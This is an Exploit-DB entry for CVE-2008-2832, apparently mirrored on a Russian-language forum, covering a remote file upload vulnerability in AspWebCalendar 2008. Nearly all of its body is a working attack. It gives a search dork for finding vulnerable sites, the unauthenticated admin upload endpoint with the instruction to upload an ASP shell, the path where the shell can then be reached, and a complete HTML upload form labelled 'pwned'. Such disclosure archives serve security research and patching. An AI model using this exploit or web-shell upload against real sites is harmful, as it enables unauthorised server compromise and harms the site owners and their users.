- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5850
- Проверка EDB
-
- Пройдено
- Автор
- ALEMIN_KRALI
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2008-2832
- Дата публикации
- 2008-06-18
Код:
Title:AspWebCalendar 2008 Remote File Upload Vulnerability
# Discovered by : Alemin_Krali
# Dork :calendar.asp?eventdetail
http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address
upload form
<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>
Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
# milw0rm.com [2008-06-18]- Источник
- www.exploit-db.com
